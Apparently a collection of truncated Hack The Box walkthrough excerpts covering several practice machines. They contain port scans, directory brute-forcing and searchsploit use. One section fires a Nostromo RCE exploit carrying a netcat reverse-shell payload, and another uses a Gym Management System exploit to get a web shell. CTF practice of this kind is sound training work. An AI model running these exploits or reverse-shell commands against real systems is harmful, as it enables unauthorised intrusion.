HTB Traceback

$ nmap -A -T4 -p- 10.10.10.181

Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.29

Access to http://10.10.10.181

Can we assume that there is a web shell in this box? Let's try to find out.

$ gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

With our usual wordlist there are no interesting results. Let's try a different one, taking into account the comment on the main site that talked about web shells…

$ gobuster dir

HTB Traverxec

$ nmap -T4 -A -p- 10.10.10.165

Open ports:
22/tcp open ssh OpenSSH 7.9p1 Debian
80/tcp open http nostromo 1.9.6

Nostromo v1.9.6 web server (http://www.nazgul.ch/dev_nostromo.html)

$ searchsploit nostromo

Our web server is vulnerable to an RCE… 🙂

$ searchsploit -m 47837
$ python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.15 1234"
$ nc -lnvp 1234
whoami
python3 -c "import pty;pty.spawn('/bin/bash')"

We are www-data, let's enumerate a little bit.

www-data@traverxec:/var/nostromo/conf$ ls -la
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd

$ chmod 600 david.key
$ ssh -i david.key david@10.10.10.165

HTB Bastion

$ nmap -A -p- -T4 10.10.10.134

Open ports:
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp

HTB Forest

$ nmap -T4 -A -p- 10.10.10.161

Open ports:

We have an Active Directory LDAP server.

Domain Controller: htb.local
OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
Domain name: htb.local
Forest name: htb.local
FQDN: FOREST.htb.local

To start with the box enumeration we can use JXplorer. JXplorer is a cross-platform LDAP browser and editor. It is a standards-compliant, general-purpose LDAP client that can be used

HTB Buff

$ nmap -A -T4 -p- 10.10.10.198 -Pn
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u http://10.10.10.198:8080 -e

Access to http://10.10.10.198:8080/

From this home site page: Access to https://projectworlds.in

There is a list of different projects. Here you will find this one: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/

From this site, you can download the whole project.

$ searchsploit Gym Management System 1.0

Using this exploit (https://www.exploit-db.com/exploits/48506):

$ python2.7 48506.py http://10.10.10.198:8080/
C:\xampp\htdocs\gym\upload> whoami
C:\xampp\htdocs\gym\upload> dir

A web shell

HTB Curling

$ nmap -T4 -A -p- 10.10.10.150
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e

If we access http://10.10.10.150/administrator/, we'll find a Joomla login form.

Accessing http://10.10.10.150:

Based on the published post, there are these users:
Super User
Floris

Looking at the source code, there is a suspicious secret.txt file somewhere.

http://10.10.10.150/secret.txt

This string seems to be encoded. Searching for "linux decode string", Google gives us the suggestion of

HTB Postman

$ nmap -A -p- -T4 10.10.10.160

Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)

$ gobuster dir -u http://10.10.10.160 -w

Access to http://10.10.10.160
Access to http://10.10.10.160:10000
Access to https://10.10.10.160:1000

Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV 10.10.10.138

Although nmap says port 80 is open, it also appears to be tcpwrapped. What does that mean?

Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,

HTB Irked

$ nmap -A -T4 -p- 10.10.10.117

Access to http://10.10.10.117

According to Nmap's results, these ports related to UnrealIRCd are open:
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
65534/tcp open irc UnrealIRCd (Admin email djmardov@irked.htb)

As we have an IRC server in this box, let's start by trying to connect to it.

$ sudo irssi 10.10.10.117 65534

According to this, we have UnrealIRCd version 3.2.8.1

$ searchsploit unrealirc

Exploiting UnrealIRC

HTB OpenAdmin

Enumeration

$ nmap -A -T4 -p- 10.10.10.171
$ gobuster dir -u 10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

Access to http://10.10.10.171
Access to http://10.10.10.171/music

There is a login link. Click it and you'll be redirected to http://10.10.10.171/ona

Based on this screenshot, we have an OpenNetAdmin (v18.1.1)

Access to http://10.10.10.171/sierra
Access to http://10.10.10.171/artwork

Vulnerability analysis

$ searchsploit opennetadmin
$ searchsploit -x 47691

The -d option in curl means data.

-d, --data: (HTTP MQTT) Sends the specified data in a POST